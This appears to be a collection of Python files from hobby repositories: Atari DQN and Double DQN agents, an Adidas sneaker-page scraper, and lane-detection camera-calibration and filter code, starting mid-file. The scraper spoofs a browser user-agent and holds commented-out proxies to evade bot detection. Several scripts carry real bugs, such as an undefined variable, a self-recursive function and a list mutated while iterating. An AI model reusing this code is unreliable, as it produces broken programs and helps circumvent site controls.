size=self.batch_size)\n batch_memory = self.memory[sample_index, :]\n\n #这一段和 DQN 不一样\n q_next, q_eval4next = self.sess.run( #一个是 Qnext 神经网络,一个是 Qevlauation 神经网络 后者是现实中用 Q 估计出来的值\n [self.q_next, self.q_eval],\n feed_dict={self.s_: batch_memory[:, -self.n_features:], # next observation\n self.s: batch_memory[:, -self.n_features:]}) # next observation\n q_eval = self.sess.run(self.q_eval, {self.s: batch_memory[:, :self.n_features]}) #t 时刻真正的值\n\n q_target = q_eval.copy()\n\n batch_index = np.arange(self.batch_size, dtype=np.int32)\n eval_act_index = batch_memory[:, self.n_features].astype(int)\n reward = batch_memory[:, self.n_features + 1]\n\n if self.double_q:# 最大的不同和 DQN 相比 如果是 double 时候\n max_act4next = np.argmax(q_eval4next, axis=1) # the action that brings the highest value is evaluated by q_eval\n # 下, DDQN选择 q_next 依据 q_eval 选出的动作. # 上,q_eval 得出的最高奖励动作.\n selected_q_next = q_next[batch_index, max_act4next] # Double DQN, select q_next depending on above actions\n else: #如果是普通 DQN\n selected_q_next = np.max(q_next, axis=1) # the natural DQN\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * selected_q_next\n #下面和 DQN 一样\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s: batch_memory[:, :self.n_features],\n self.q_target: q_target})\n self.cost_his.append(self.cost)\n\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
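The decisive lines in `DoubleDQN.learn()` above are the action selection/evaluation split. Pulled out of the class for clarity, the target construction looks like this (an illustrative NumPy restatement of the source's logic, not a new API):

```python
import numpy as np

def double_dqn_targets(q_next, q_eval4next, q_eval, actions, rewards, gamma):
    """Sketch of the target construction used in DoubleDQN.learn().

    q_next      -- target-net Q values at s', shape (batch, n_actions)
    q_eval4next -- eval-net Q values at s', same shape
    q_eval      -- eval-net Q values at s, same shape
    actions     -- actions taken, shape (batch,), int
    rewards     -- rewards, shape (batch,)
    """
    batch_index = np.arange(len(rewards))
    # Double DQN: the eval net picks the action, the target net scores it,
    # which curbs the overestimation seen in the natural DQN curve.
    max_act4next = np.argmax(q_eval4next, axis=1)
    selected_q_next = q_next[batch_index, max_act4next]
    q_target = q_eval.copy()
    q_target[batch_index, actions] = rewards + gamma * selected_q_next
    return q_target
```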
{
"alpha_fraction": 0.6867289543151855,
"alphanum_fraction": 0.7244859933853149,
"avg_line_length": 29.724138259887695,
"blob_id": "ead2cd0fff6305fdd082b62fcb9d3092a9f9070f",
"content_id": "ef34dba75cf599e0189e9e1b9bdbebb861d89598",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2675,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 87,
"path": "/Gym_Enduro/DRL_enduro.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 28 10:59:10 2018\nDRL for Atatri Enduro-v0 game\nbased on: https://github.com/matrixBT/DQN-Atari-Enduro/blob/master/Dqn_atari_Enduro.ipynb\n@author: Morgan\n\"\"\"\nfrom __future__ import division\nfrom time import sleep\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n#%matplotlib inline\nfrom PIL import Image\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Activation, Flatten, Dropout, concatenate, Permute\nfrom keras.layers import Input, Conv2D\nfrom keras.optimizers import Adam\nfrom keras.activations import relu, linear\nfrom keras.layers.advanced_activations import LeakyReLU\n\n\nfrom rl.agents.dqn import DQNAgent\nfrom rl.policy import LinearAnnealedPolicy, EpsGreedyQPolicy\nfrom rl.memory import SequentialMemory\nfrom rl.core import Processor\n\n\n# envrionment\nenv = gym.make('Enduro-v0')\n\nenv.render()\nsleep(1)\nenv.close()\n\nnb_actions = env.action_space.n\nprint('Total number of Possible actoin is :', nb_actions)\n\nframe_shape = (84, 84)\nwindow_length = 4\ninput_shape = (window_length,) + frame_shape\nprint('Input Shape is :', input_shape)\n\nclass GameProcess(Processor):\n def process_observation(self, observation):\n img = Image.fromarray(observation)\n img = np.array(img.resize(frame_shape).convert('L'))\n return img.astype('uint8') \n\n def process_state_batch(self, batch):\n Processed_batch = batch.astype('float32') / 255.\n return Processed_batch\n\n def process_reward(self, reward):\n return np.clip(reward, -1., 1.)\n \nmodel = Sequential()\nmodel.add(Permute((2, 3, 1), input_shape=input_shape))\nmodel.add(Conv2D(32, (8, 8), strides=(4, 4)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (4, 4), strides=(2, 2)))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, (3, 3), strides=(1, 1)))\nmodel.add(Activation('relu'))\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dense(nb_actions))\nmodel.add(Activation('linear'))\nprint(model.summary()) \n \n# allocating memory for experience replay\nmemory = SequentialMemory(limit=1000000, window_length=window_length) \n\n# Epsilon Greedy Exploration\npolicy = LinearAnnealedPolicy(EpsGreedyQPolicy(), attr='eps', value_max=1., value_min=.1, value_test=.05, nb_steps=1000000)\n\n# Compiling DQN Agent\ndqn = DQNAgent(model=model, nb_actions=nb_actions, policy=policy, memory=memory, processor=GameProcess(),\n nb_steps_warmup=50000, gamma=.99, target_model_update=10000, train_interval=4, delta_clip=1.)\n\ndqn.compile(Adam(lr=.00025), metrics=['mae'])\n\nhistory = dqn.fit(env, nb_steps=500000)\n\n\n"
},
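The `LinearAnnealedPolicy` configuration above anneals epsilon from 1.0 down to 0.1 over the first million steps. A tiny sketch of that schedule (illustrative; keras-rl computes it internally, this just restates the configured constants):

```python
def annealed_eps(step, value_max=1.0, value_min=0.1, nb_steps=1_000_000):
    """Linear epsilon schedule matching the policy configured above."""
    frac = min(step / nb_steps, 1.0)
    return value_max + frac * (value_min - value_max)

print(annealed_eps(0))          # 1.0  (fully random at the start)
print(annealed_eps(500_000))    # 0.55
print(annealed_eps(2_000_000))  # 0.1  (clamped after nb_steps)
```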
{
"alpha_fraction": 0.5569892525672913,
"alphanum_fraction": 0.6924731135368347,
"avg_line_length": 15.034482955932617,
"blob_id": "8f97a0f86c600aecc06f3c6c88f401d414fd8b84",
"content_id": "95ede0c04e9d3588fbec9a1dda6c73b9c3d82705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 29,
"path": "/Gym_Enduro/configure.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 29 18:20:06 2018\n\n@author: menghaw1\n\"\"\"\n\nENV_NAME = 'Enduro-v0'\nRENDER = 1\nNUM_EPISODES = 5000\nNUM_EP_STEPS = 3000\nMEMEOY_SIZE = 50000 # adjustable\nLOG_PATH = \"Enduro_log/Dueling1\"\n\nTRAIN_FREQUENCY = 2\n\n# Hyperparameter\nLR = 0.00025\nGAMMA = .99\nREPLACE_TARGET = 1000\nBATCH_SIZE = 32\n\n#learning_rate=0.001\n#reward_decay=0.9\n#e_greedy=0.9\n#replace_target_iter=200\n#memory_size=3000\n#batch_size=32\n"
},
{
"alpha_fraction": 0.5130080580711365,
"alphanum_fraction": 0.5420541167259216,
"avg_line_length": 48.21243667602539,
"blob_id": "9d138f96fffa3675a06446f52c8c20754baf75ab",
"content_id": "2f5d1fa8bfbc25ce93d4689ae48b556ea0e1baa5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9733,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 193,
"path": "/Gym_Enduro/DuelingDQN.py",
"repo_name": "MorganWoods/ReinforcementLearning",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 30 13:02:11 2018\n@author: menghaw1\nTodo: utilize n_features argument.\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom collections import deque\nimport random\n\nclass DuelingDQN: # Dueling network and DQN network\n \n def __init__( # 默认参数放在前面\n self,\n n_actions,\n n_features,\n learning_rate=0.001,\n reward_decay=0.9,\n e_greedy=0.9,\n replace_target_iter=200,\n memory_size=3000,\n batch_size=32,\n e_greedy_increment=None,\n output_graph=True,\n dueling=True,\n sess=None,\n ):\n self.n_actions = n_actions\n self.n_features = n_features\n self.lr=learning_rate\n self.gamma=reward_decay\n self.epsilon_max = e_greedy\n self.replace_target_iter = replace_target_iter #隔了多少部更换 Q 值\n self.memory_size = memory_size\n self.batch_size = batch_size#随机梯度下降用到\n self.epsilon_increment = e_greedy_increment\n self.epsilon = 0 if e_greedy_increment is not None else self.epsilon_max \n # total learning step\n self.learn_step_counter = 0#学习时记录多少步 ,用于判断是否更换 target net 参数\n # initialize zero memory [s, a, r, s_]\n #self.memory = np.zeros((self.memory_size, n_features * 2 + 2))#存储记忆长✖️高 建立上一行的矩阵\n self.M = deque(maxlen=self.memory_size)\n # consist of [target_net, evaluate_net]\n \n self.build_network()\n t_params = tf.get_collection('target_net_params') #提取 target net 的参数\n e_params = tf.get_collection('eval_net_params') #tiqu eval net 的参数\n self.replace_target_op = [tf.assign(t, e) for t, e in zip(t_params, e_params)]#把 t 的值变为 e 的值 #更新目标网络参数\n \n self.sess = sess\n self.sess.run(tf.global_variables_initializer())\n \n def build_network(self):\n# def setInitState(self,observation):\n# self.currentState = np.stack((observation, observation, observation, observation), axis = 2) \n# def weight_variable(shape):\n# initial = tf.truncated_normal(shape, stddev = 0.01)\n# return tf.Variable(initial) \n# def bias_variable(shape):\n# initial = tf.constant(0.01, shape = shape)\n# return tf.Variable(initial) \n def conv2d(x, W, stride):\n return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"VALID\") \n# def max_pool_2x2(x):\n# return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n \n def build_layers(s, c_name): \n # inputs layer\n #s = tf.placeholder('float', [None, 80, 80, 4]) \n# W_conv1 = weight_variable([8,8,4,32]) #(filter_height, filter_width, in_channels, out_channels)\n# b_conv1 = bias_variable([32]) \n# W_conv2 = weight_variable([4,4,32,64])\n# b_conv2 = bias_variable([64]) \n# W_conv3 = weight_variable([3,3,64,64])\n# b_conv3 = bias_variable([64]) \n# W_fc1 = weight_variable([2304,512]) # search how to compute number of cell\n# b_fc1 = bias_variable([512]) \n# W_fc2 = weight_variable([512, self.n_actions])\n# b_fc2 = bias_variable([self.n_actions])\n \n w_init = tf.random_normal_initializer(0., 0.3)\n b_init = tf.constant_initializer(0.1)\n # input layer\n \n #stateinput = tf.placeholder('float',[None,80,80,4])\n with tf.variable_scope('conv1'): \n w_c1 = tf.get_variable('w_c1', [8,8,4,32], initializer=w_init, collections=c_name)\n b_c1 = tf.get_variable('b_c1', [1,32], initializer=b_init, collections=c_name)\n conv1 = tf.nn.relu(conv2d(s,w_c1,4)+b_c1)\n with tf.variable_scope('conv2'): \n w_c2 = tf.get_variable('w_c2', [4,4,32,64], initializer=w_init, collections=c_name)\n b_c2 = tf.get_variable('b_c2', [1,64], initializer=b_init, collections=c_name)\n conv2 = tf.nn.relu(conv2d(conv1,w_c2,2)+b_c2)\n with tf.variable_scope('conv3'): \n w_c3 = 
tf.get_variable('w_c3', [3,3,64,64], initializer=w_init, collections=c_name)\n b_c3 = tf.get_variable('b_c3', [1,64], initializer=b_init, collections=c_name)\n conv3 = tf.nn.relu(conv2d(conv2,w_c3,1)+b_c3)\n conv3_flat = tf.reshape(conv3,[-1,2304])\n with tf.variable_scope('fc1'): \n w_f1 = tf.get_variable('w_f1', [2304,512], initializer=w_init, collections=c_name)\n b_f1 = tf.get_variable('b_f1', [1,512], initializer=b_init, collections=c_name)\n fc1 = tf.nn.relu(tf.matmul(conv3_flat,w_f1)+b_f1)\n #Q value\n with tf.variable_scope('fc2'): \n w_f2 = tf.get_variable('w_f2', [512, self.n_actions], initializer=w_init, collections=c_name)\n b_f2 = tf.get_variable('b_f2', [1, self.n_actions], initializer=b_init, collections=c_name)\n out = tf.matmul(fc1, w_f2) + b_f2 \n return out \n # -----------------build evaluate net-----------------#\n self.s = tf.placeholder(tf.float32,[None,80,80,4]) # replace it with features shape \n self.q_target = tf.placeholder(tf.float32,[None, self.n_actions])\n \n with tf.variable_scope('eval_net'):\n c_name = ['eval_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.q_eval = build_layers(self.s, c_name)\n with tf.variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.squared_difference(self.q_target, self.q_eval))\n with tf.variable_scope('train'):\n self._train_op = tf.train.RMSPropOptimizer(self.lr).minimize(self.loss)\n \n # -----------------build target net-----------------#\n self.s_ = tf.placeholder(tf.float32, [None,80,80,4])\n with tf.variable_scope('target_net'):\n c_name = ['target_net_params', tf.GraphKeys.GLOBAL_VARIABLES]\n self.q_next = build_layers(self.s_, c_name) \n \n def choose_action(self, state): # state is an array , shape (1,80,80,4)\n #observation = tf.convert_to_tensor(state)\n #observation = tf.reshape(observation, [-1, 80, 80, 1]) # (batch, in_height, in_width, in_channels) \n #observation = observation[np.newaxis, :]\n #observation = np.stack((state, state, state, state), axis = -1) # shape:(1, 80, 80, 4)\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s: state})\n action = np.argmax(actions_value)\n if np.random.uniform() > self.epsilon:\n action = np.random.randint(0, self.n_actions) \n return action\n \n def remember(self, s, a, r, s_): # s is an array (1, 80, 80, 4),\n if not hasattr(self, 'memory_counter'): # it returns true if an object has the given name attribute. 
vice versa.\n self.memory_counter = 0 \n # \n s = s.reshape((80,80,4))\n s_ = s_.reshape((80,80,4))\n \n self.M.append((s, a, r, s_))\n \n #transition = np.hstack((s, [a, r], s_))# if this doesn't work, plz use deque as memory\n #index = self.memory_counter % self.memory_size\n #self.memory[index, :] = transition\n self.memory_counter += 1\n \n def learn(self): # very slow when it learning...\n # target network\n if self.learn_step_counter % self.replace_target_iter == 0:\n self.sess.run(self.replace_target_op)\n print('\\ntarget_params_replaced\\n') \n #sample_index = np.random.choice(min(self.memory_size, self.memory_counter), size=self.batch_size)\n# if self.memory_counter > self.memory_size:\n# sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n# else:\n# sample_index = np.random.choice(self.memory_counter, size=self.batch_size)\n #batch_memory = self.M[sample_index] # sample_index is array([..,..,..,...])\n \n batch_memory = random.sample(self.M, self.batch_size)\n s_batch = [d[0] for d in batch_memory]\n a_batch = [d[1] for d in batch_memory]\n r_batch = [d[2] for d in batch_memory]\n s_batch_ = [d[3] for d in batch_memory]\n q_next = self.sess.run(self.q_next, feed_dict={self.s_: s_batch_})# next observation\n\n q_eval = self.sess.run(self.q_eval, {self.s: s_batch})\n \n q_target = q_eval.copy()\n \n batch_index = np.arange(self.batch_size, dtype=np.int32)\n \n #eval_act_index = a_batch.astype(int)\n #reward = batch_memory[:,]\n \n q_target[batch_index, a_batch] = r_batch + self.gamma * np.max(q_next, axis=1) # DQN\n\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s: s_batch,\n self.q_target: q_target})\n #print('cost:', self.cost)\n #tf.summary.scalar('cost',self.cost)\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n self.learn_step_counter += 1\n \n #return self.cost\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n "
}
] | 15 |
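The `learn` step in the DQN code above builds its training targets with the standard Bellman update: only the Q-value of the action actually taken is moved toward `r + gamma * max(Q_next)`. A minimal numeric sketch of that update (the array values, batch size, and `gamma` below are made up for illustration):

```python
import numpy as np

gamma = 0.9
# Hypothetical network outputs for a batch of 2 transitions and 3 actions
q_eval = np.array([[0.1, 0.5, 0.2],
                   [0.3, 0.4, 0.9]])   # eval net, Q(s, .)
q_next = np.array([[0.2, 0.6, 0.1],
                   [0.8, 0.3, 0.5]])   # target net, Q(s', .)
a_batch = np.array([1, 2])             # actions taken
r_batch = np.array([1.0, 0.0])         # rewards received

q_target = q_eval.copy()
batch_index = np.arange(2)
q_target[batch_index, a_batch] = r_batch + gamma * np.max(q_next, axis=1)
print(q_target)
# [[0.1  1.54 0.2 ]
#  [0.3  0.4  0.72]]
```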
Gareebear/Projects
|
https://github.com/Gareebear/Projects
|
b79144eac575df075069176679e07019e9729e47
|
a686c5ef2a676d0f21e455870360e3d5f6531e8f
|
dd44555f6ec386b29442b8bf59a87dcb644918ee
|
refs/heads/master
| 2020-05-21T11:08:41.177841 | 2018-11-25T01:54:34 | 2018-11-25T01:54:34 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6034482717514038,
"alphanum_fraction": 0.6256157755851746,
"avg_line_length": 32.91666793823242,
"blob_id": "68b01f7e9b29324e0cdf81217cfb2eed406233d9",
"content_id": "0bed07a15666ceca039ccfce05f393a9f8a173ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 12,
"path": "/URLGen.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "def URLGen(model, size):\n BaseSize = 580 #For shoe size 6.5\n ShoeSize = float(size) - 6.5\n ShoeSize *= 20 #Generates our size code\n RawSize = ShoeSize + BaseSize\n SizeCode = int(RawSize)\n URL = 'https://www.adidas.com/us/' + str(model) + '.html?forceSelSize=' + str(model) + '_' + str(SizeCode)\n return URL\n\n#Model = input('Model #:')\n#Size = input('Size: ')\n#print(URLGen(Model,Size))"
},
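The size-code arithmetic in `URLGen` anchors US size 6.5 at code 580 and adds 20 per full size (10 per half size). A quick worked check of the same formula (the model number below is only a placeholder):

```python
def url_gen(model, size):
    # Same arithmetic as URLGen above: code 580 is size 6.5, +20 per full size
    size_code = int((float(size) - 6.5) * 20 + 580)
    return 'https://www.adidas.com/us/{0}.html?forceSelSize={0}_{1}'.format(model, size_code)

# Size 10: (10 - 6.5) * 20 + 580 = 650
print(url_gen('F36156', 10))
# https://www.adidas.com/us/F36156.html?forceSelSize=F36156_650
```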
{
"alpha_fraction": 0.643784761428833,
"alphanum_fraction": 0.654916524887085,
"avg_line_length": 31.636363983154297,
"blob_id": "045e5ff3316b91a6d4a3ff654cc5521b9d778fb0",
"content_id": "e2e176c3978ece77285af41c626de4931924ff19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1078,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 33,
"path": "/Bot.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import bs4 \nfrom selenium import webdriver\nimport os\n\ndef render_page(url,agent): #Loads page for processing\n chromedriver = \"./chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n options.add_argument('--headless')\n options.add_argument(f'user-agent={agent}')\n driver = webdriver.Chrome(chromedriver)\n driver.get(url)\n r = driver.page_source\n return r\n\ndef URLGen(model, size): #Generates URLs\n BaseSize = 580 #For shoe size 6.5\n ShoeSize = float(size) - 6.5\n ShoeSize *= 20 #Generates our size code\n RawSize = ShoeSize + BaseSize\n SizeCode = int(RawSize)\n URL = 'https://www.adidas.com/us/' + str(model) + '.html?forceSelSize=' + str(model) + '_' + str(SizeCode)\n return URL\n\ndef GetSizes(url): #Returns all available sizes\n response = render_page(url)\n page = bs4.BeautifulSoup(response,\"lxml\")\n print(page.title.string)\n l = page.find_all('div',{\"class\" : \"gl-square-list__cta\"})\n sizes = []\n for i in range(0,len(l)):\n print(l[i].text)\n sizes.append(l[i].text)\n return sizes\n\n"
},
{
"alpha_fraction": 0.5954875349998474,
"alphanum_fraction": 0.6809024810791016,
"avg_line_length": 28.547618865966797,
"blob_id": "e862ebc7591ca263a9586ded17e07add40009930",
"content_id": "16f408c1a74402e57509cf19d4e02eff7cf888cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1241,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 42,
"path": "/Scraper.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import requests\nimport bs4 \nfrom selenium import webdriver\nimport random\nimport os\nimport time\n\nagent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'\n\ndef render_page(url):\n #Grabs our Chrome Driver and sets PATH\n chromedriver = \"./chromedriver\"\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument(f'user-agent={agent}')\n driver = webdriver.Chrome(chromedriver,options=options)\n driver.get(url)\n #time.sleep(2)\n r = driver.page_source\n return r\n\n\n#headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n#proxies = {\n# \"https\": 'https://37.53.83.40:34934',\n# \"https\": 'https://139.0.23.188:32551'\n#}\n\n#url = 'https://www.adidas.com/us/F36156.html?forceSelSize=F36156_600'\n#response = render_page(url)\n#page = bs4.BeautifulSoup(response,\"lxml\")\n#print(page.title.string)\n#l = page.find_all('div',{\"class\" : \"gl-square-list__cta\"})\n\n#sizes = []\n\n#for i in range(0,len(l) - 1):\n# print(l[i].text)\n# sizes.append(l[i].text)\n\n#print(sizes)\n"
},
{
"alpha_fraction": 0.5856603980064392,
"alphanum_fraction": 0.6120754480361938,
"avg_line_length": 29.837209701538086,
"blob_id": "24404e9f4bf39f1a8905701b18298492a91bcdbc",
"content_id": "45519a90322d7b7409e8491445bc29524af85ecb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1325,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 43,
"path": "/Spider.py",
"repo_name": "Gareebear/Projects",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport Scraper\nfrom Utils import isInt\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'}\n#Find max product page\ndef findMaxPage():\n baseURL = 'https://www.adidas.com/us/men-shoes'\n res = requests.get(baseURL,headers=headers)\n page = BeautifulSoup(res.text,'lxml')\n pageindex = page.find_all('li',{'class':'gl-dropdown__option'})\n pagenumbers = []\n pages = []\n for index in pageindex:\n if isInt(index.text):\n pagenumbers.append(int(index.text))\n\n for i in range(0,len(pagenumbers)):\n if i == 0:\n pages.append(baseURL)\n else:\n index = \"?start=\" + str(i * 48)\n pages.append(baseURL + index)\n return pages\n\n#Find all products href\ndef findProducts():\n pages = findMaxPage()\n res = []\n page = []\n products = []\n for i in range(0,len(pages)):\n res.append(requests.get(pages[i],headers=headers))\n page.append( BeautifulSoup(res[i].text,'lxml') )\n products = page[i].find_all('div',{'class':'gl-product-card__details'})\n for a in products:\n b = a.find('a',href=True)\n products.append(b['href'])\n \n return products\n\nfindProducts()"
}
] | 4 |
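`Spider.findMaxPage` above paginates the listing by stepping the `start` query parameter in increments of 48, the number of products shown per listing page. The URL scheme it produces, sketched here for an assumed three pages:

```python
base_url = 'https://www.adidas.com/us/men-shoes'

# Same offset scheme as findMaxPage, assuming 3 listing pages
pages = [base_url if i == 0 else base_url + '?start=' + str(i * 48) for i in range(3)]
for p in pages:
    print(p)
# https://www.adidas.com/us/men-shoes
# https://www.adidas.com/us/men-shoes?start=48
# https://www.adidas.com/us/men-shoes?start=96
```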
JJMats/lane_finding
|
https://github.com/JJMats/lane_finding
|
9412f0cfac5f6a33b49e7f608a57bea39540e2c7
|
0eec373965f08c1b296dc4167c7c658d2d943571
|
64c80320f60c0020dceea8fe08f16a1dcbe495d8
|
refs/heads/master
| 2020-07-11T00:24:20.899036 | 2019-09-06T07:09:15 | 2019-09-06T07:09:15 | 204,408,569 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.788309633731842,
"alphanum_fraction": 0.788309633731842,
"avg_line_length": 69.33333587646484,
"blob_id": "bd6d30f78ad1d449eceec7c37862df8c0dae6445",
"content_id": "fa575857d0f09ed895432b37aa6354dd54006129",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 633,
"license_type": "no_license",
"max_line_length": 350,
"num_lines": 9,
"path": "/README.md",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "## Lane Finding\n\n### Description\n\nLane finding app for the Jetson Nano Development Board.\n\nThis is a work in progress! The plan here is to extract the filters, helper functions, and classes from the Advanced Lane Finding Jupyter notebook into Python scripts. Then, I would like to assemble a pipeline to pull images from a live camera and overlay the detected lane image on top of them. This video can then be saved to disk for later review.\n\nAdditional thoughts include ROS integration, receiving vehicle CAN data for additional live overlays (throttle position, brake, vehicle speed, etc.). I also plan to rewrite this all in C++.\n"
},
{
"alpha_fraction": 0.6399155259132385,
"alphanum_fraction": 0.6504752039909363,
"avg_line_length": 26.852941513061523,
"blob_id": "e8780fb71e4c77e32004ea511c3b2581a7d18dda",
"content_id": "c1d5f12d5718dffc9a01618804893669d85bba5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1894,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 68,
"path": "/camera_cal.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "import os, glob, cv2\nimport numpy as np\nimport matplotlib.image as mpimg\n\n# Get camera calibration images\n# TODO: Move this into a function that will calibrate the camera\n# and return the calibration matrix.\ncamera_cal_img_files = glob.glob(\"images/camera_cal/calibration*\")\n\ndef cal_camera(img, obj_points, img_points):\n '''\n Take an image, object points, and image points, calibrate the camera,\n then correct and return an undistorted version of the image.\n\n Returns ret, mtx, dist, rvecs, tvecs\n '''\n\n return cv2.calibrateCamera(obj_points, img_points, img.shape[1:3], None, None)\n\n\ndef undistort_image(img, mtx, dist):\n '''\n Take an image and camera calibration values, undistort the image, and \n return it.\n '''\n\n return cv2.undistort(img, mtx, dist, None, mtx)\n\n\ndef import_calibration_images(img_points, obj_points):\n # Prepare object points\n nx = 9\n ny = 6\n\n # Get known coordinates of the corners in the image\n objp = np.zeros((ny*nx, 3), np.float32)\n\n # Generate x, y-coordinates\n objp[:,:2] = np.mgrid[0:nx, 0:ny].T.reshape(-1,2)\n\n for fname in camera_cal_img_files:\n image = mpimg.imread(fname)\n img = np.copy(image)\n\n # Convert image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\n # Find chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (nx, ny), None)\n\n if ret == True:\n img_points.append(corners)\n obj_points.append(objp)\n img = cv2.drawChessboardCorners(img, (nx, ny), corners, ret)\n\n\ndef undistort_image(image):\n '''\n Take an image as input, undistort with learned camera calibration\n values.\n '''\n obj_points = []\n img_points = []\n\n ret, mtx, dist, rvecs, tvecs = cal_camera(image, obj_points, img_points)\n img_undst = undistort_image(image, mtx, dist)\n\n return img_undst\n"
},
{
"alpha_fraction": 0.5802013874053955,
"alphanum_fraction": 0.6159409880638123,
"avg_line_length": 31.799999237060547,
"blob_id": "662a4c6bb8169e815bd7eb881a240be3ccea245d",
"content_id": "a9d41831830353d1b6d2decdff3a5f3dc575c572",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7051,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 215,
"path": "/filters.py",
"repo_name": "JJMats/lane_finding",
"src_encoding": "UTF-8",
"text": "# Image filtering functions\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport helpers\n\ndef abs_sobel_thresh(image, orient='x', kernel_size=3, thresh=(0, 255)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n #Take the derivative in the axis specified by the orient parameter\n if orient=='x':\n sobel = cv2.Sobel(gray, cv2.CV_64F, 1, 0, kernel_size)\n else:\n sobel = cv2.Sobel(gray, cv2.CV_64F, 0, 1, kernel_size)\n \n # Get the absolute value of the derivative\n sobel_abs = np.absolute(sobel)\n \n # Scale absolute value to 8-bits\n sobel_norm = np.uint8(255*sobel_abs/np.max(sobel_abs))\n \n # Create a mask of 1's where the scaled derivative magnitude is between the threshold parameters\n sobel_bin = np.zeros_like(sobel_norm)\n sobel_bin[(sobel_norm >= thresh[0]) & (sobel_norm <= thresh[1])] = 1\n \n return sobel_bin\n\n\ndef mag_thresh(image, kernel_size=3, mag_thresh=(0,255)):\n img = np.copy(image)\n \n # Convert the image to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # Calculate the derivative in x and y-directions\n sobelx = cv2.Sobel(gray, 